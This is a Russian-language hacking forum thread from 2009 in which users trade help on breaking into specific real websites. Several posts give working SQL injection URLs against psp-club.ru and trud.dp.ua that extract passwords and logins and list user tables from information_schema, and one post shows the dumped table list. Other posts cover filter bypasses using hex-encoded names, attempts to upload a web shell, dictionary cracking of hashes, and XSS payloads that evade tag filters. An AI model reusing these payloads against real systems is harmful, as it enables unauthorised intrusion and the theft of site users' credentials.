Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Там несколько таблиц users. (4+)

    Code:
    http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim.users/*
    Code:
    http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_gaming.users/*
     
    #5321 R1dex, 8 Feb 2009
    Last edited: 8 Feb 2009
  2. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Первый логин может быть пустой, либо в таблице вообше записей нет.
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Люди,что хранится в .cpan/.lock ?

    Открыл,а там название сайта и вверху какие-то цифферки...проясните а(


    Ещё проблема: Скачал словарь с этого форума в .тхт формате,подрубаю в PasswordsPro,предварительно закинув его в папку Dictionaries.Затем проставил Атака по Словарям.Запустил,а мне выдало,что простая атака по словарям закончена:((
     
    #5323 Велемир, 8 Feb 2009
    Last edited: 8 Feb 2009
  4. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    помогите пожалуиста разобраться, какой тип данных в третьем поле? или на какой его изменить?
    пробывал to_char() to_number() итд ничего не подходит =,( простите за мою глупость, просто в первый раз встречаюсь с иньекцией в оракле
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А можно полный список баз и метод доставания всех баз? Лимит не катит...
     
  6. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    mailbrush имя бд, где находиться нужная таблица можешь узнать так:
    p.s. но лучше имя таблицы набирай в хэксе без кавычек, т.к. они могут фильтроваться, например table_name=0x7573657273
     
    #5326 pinky07, 8 Feb 2009
    Last edited: 8 Feb 2009
    1 person likes this.
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Отлично работает лимит. Прочти это:

    https://forum.antichat.ru/thread104591.html

    Или любой мануал по синтаксису
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    pinky007, thx! Ковычки не режет. Есть путь к корню полный, но шелл почему-то не льёт. Путь /home/vmail/domains/psp-club.ru/. Кто поможет - скиньте плиз в личку... Вам же этого сайта не надо, а мне очень нужно...
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    mailbrush там file_priv-n
    Я же дал линк на тему, там всё это описывается, неужели нет времени на чтение
     
    2 people like this.
  10. none222

    none222 Guest

    Reputations:
    0
    пиши так:
    <ionmousemove=alert()>OVER

    оно само разделит)

    А теперь мой вопрос.

    Ошибка типа:
    запрос был вида:
    вобщем нульбайт фильтруется
     
  11. none222

    none222 Guest

    Reputations:
    0
    Или кста те ещё так подойдёт:

    <bstyle="background:url(javascript:alert()); ">хек
    разделится как:
    <b style="background:url(javascript:alert()); ">хек

    или атк:

    <bstyle=background:url(javascript:alert())>xek
     
  12. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    скажите пожалуйста,это скуль? если да,то как вывести инфу?
    Code:
    http://trud.dp.ua/vacancysearch.php?&short_view=1&pagenumber=http://wwwwwwww/&age=1&salary=1&branch=1&area=1&sex=1&education=1&days=1 
    паук написал что это реальный путь к серверу
     
    #5332 TELO, 9 Feb 2009
    Last edited: 9 Feb 2009
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://trud.dp.ua/vacancyview.php?pagenumber=10&branch=-1'&area=


    Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/trudv2eq/trud-v2.dp.ua/vacancyview.php on line 24

    вот.....
     
  14. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    там нет выводимых полей, хотя инфу из бд вполне реально вывести подзапросами, тем более там пятая версия MySQL и там доступно information_schema

    вот - там пять таблиц с именем %user%
     
    #5334 pinky07, 9 Feb 2009
    Last edited: 9 Feb 2009
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Если не уверен, зачем вводить людей в заблуждение?

    http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,concat_ws(0x3a,User(),Database(),Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18/*

    Завязывай писать ахинею.

    Если уж используешь подзапросы, то подумай, что ты вывел таким образом.

    Таблиц с именем %user% там 15, если уж быть точным

    http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,group_concat(concat_ws(0x3a,table_schema,table_name)),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18+from+information_schema.tables+where+table_name+LIKE+char(37,117,115,101,114,37)/*

    information_schema:USER_PRIVILEGES
    cacti:user_auth
    cacti:user_auth_perms
    cacti:user_auth_realm
    cacti:user_log,mysql:user
    printmedia:adm_users
    trainings:adm_users
    trainings:cron_user
    trn:adm_users
    trn:cron_user
    truddp:adm_users
    work-xeon:admin_user
    work-xeon:cron_user
    work-xeon:trud_reason_for_blocking_user
    work-xeon:trud_user
     
    #5335 Kakoytoxaker, 9 Feb 2009
    Last edited: 9 Feb 2009
    2 people like this.
  16. coolz

    coolz New Member

    Joined:
    9 Feb 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    а что дальше???
     
  17. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Дальше ничего, ты там видешь содержимое passwd? Нет там этой уязвимости.
     
    #5337 AkyHa_MaTaTa, 9 Feb 2009
    Last edited: 9 Feb 2009
  18. coolz

    coolz New Member

    Joined:
    9 Feb 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Может поможет кто??
     
  19. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    скажите пожалуйста,почему вывода нет?
     
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Где вывода нет? Пробелы убери.
     
    #5340 R1dex, 9 Feb 2009
    Last edited: 9 Feb 2009
Thread Status:
Not open for further replies.